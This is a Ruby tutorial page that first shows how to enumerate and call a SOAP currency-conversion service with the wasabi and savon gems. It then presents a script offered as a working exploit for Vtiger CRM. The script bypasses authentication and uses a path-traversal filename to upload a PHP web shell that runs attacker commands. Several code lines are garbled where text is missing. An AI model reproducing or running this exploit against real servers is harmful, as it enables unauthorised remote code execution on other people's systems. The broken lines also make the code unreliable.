Interacting with Web Services


Generally speaking, dealing with SOAP means dealing with XML messages and a WSDL file (also XML) that describes how to use a given SOAP API. Ruby has really elegant way to do so and let’s to get our hand dirty with an exploit

  • Install wasabi, sabvon & httpclient gems
    1. gem install wasabi savon httpclient


  1. require 'wasabi'
  2. url = ""
  3. document = Wasabi.document url
  4. # Parsing the document
  5. document.parser
  6. # SOAP XML
  7. document.xml
  8. # Getting the endpoint
  9. document.endpoint
  10. # Getting the target namespace
  11. document.namespace
  12. # Enumerate all the SOAP operations/actions
  13. document.operations
  14. # Enumerate input parameters for particular operation
  15. document.operation_input_parameters :conversion_rate
  16. # Enumerate all available currencies
  17. document.parser.document.element_children.children[1].children[1].children[3].children[1] {|c| c.attributes.values[0].to_s}


  1. >> url = ""
  2. => ""
  3. >> document = Wasabi.document url
  4. => #<Wasabi::Document:0x00000002c79a50 @adapter=nil, @document="">
  5. >> # Parsing the document
  6. >> document.parser
  7. => #<Wasabi::Parser:0x0000000281ebb8
  8. @deferred_types=[],
  9. @document=
  10. #(Document:0x140fa3c {
  11. name = "document",
  12. children = [
  13. #(Element:0x140f294 {
  14. name = "definitions",
  15. namespace = #(Namespace:0x14017e8 { prefix = "wsdl", href = "" }),
  16. attributes = [ #(Attr:0x1a507d4 { name = "targetNamespace", value = "http://www.webserviceX.NET/" })],
  17. children = [
  18. #(Text "\n "),
  19. ---kipped---
  20. >> # Getting the endpoint
  21. >> document.endpoint
  22. => #<URI::HTTP>
  23. >> # Getting the target namespace
  24. >> document.namespace
  25. => "http://www.webserviceX.NET/"
  26. >> # Enumerate all the SOAP operations/actions
  27. >> document.operations
  28. => {:conversion_rate=>
  29. {:action=>"http://www.webserviceX.NET/ConversionRate",
  30. :input=>"ConversionRate",
  31. :output=>"ConversionRateResponse",
  32. :namespace_identifier=>"tns",
  33. :parameters=>{:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}}}
  34. >> # Enumerate input parameters for particular operation
  35. >> document.operation_input_parameters :conversion_rate
  36. => {:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}


  1. require 'savon'
  2. url = ""
  3. client = Savon.client(wsdl: url)
  4. message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}
  5. response =, message: message).body
  6. response[:conversion_rate_response][:conversion_rate_result]


  1. >> message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}
  2. => {"FromCurrency"=>"EUR", "ToCurrency"=>"CAD"}
  3. >> response =, message: message).body
  4. => {:conversion_rate_response=>{:conversion_rate_result=>"1.4417", :@xmlns=>"http://www.webserviceX.NET/"}}
  5. 1.4415

Hacking via SOAP vulnerabilities

This is a working exploit for Vtiger CRM SOAP from auth-bypass to shell upload

  1. #!/usr/bin/env ruby
  3. # gem install savon httpclient
  4. #
  5. require 'savon'
  6. if ARGV.size < 1
  7. puts "[+] ruby #{__FILE__} [WSDL URL]"
  8. exit 0
  9. else
  10. url = ARGV[0]
  11. end
  12. shell_data, shell_name = "<?php system($_GET['cmd']); ?>", "shell-#{rand(100)}.php"
  13. # Start client
  14. client = url)
  15. # List all available operations
  16. puts "[*] List all available operations "
  17. puts client.operations
  18. puts "\n\n[*] Interact with :add_email_attachment operation"
  19. response = :add_email_attachment,
  20. message: {
  21. emailid: rand(100),
  22. filedata: [shell_data].pack("m0"),
  23. filename: "../../../../../../#{shell_name}",
  24. filesize: shell_data.size,
  25. filetype: "php",
  26. username: "KING",
  27. sessionid: nil
  28. }
  29. )
  30. puts "[+] PHP Shell on: http://#{URI.parse(url).host}/vtigercrm/soap/#{shell_name}?cmd=id"

More about Savon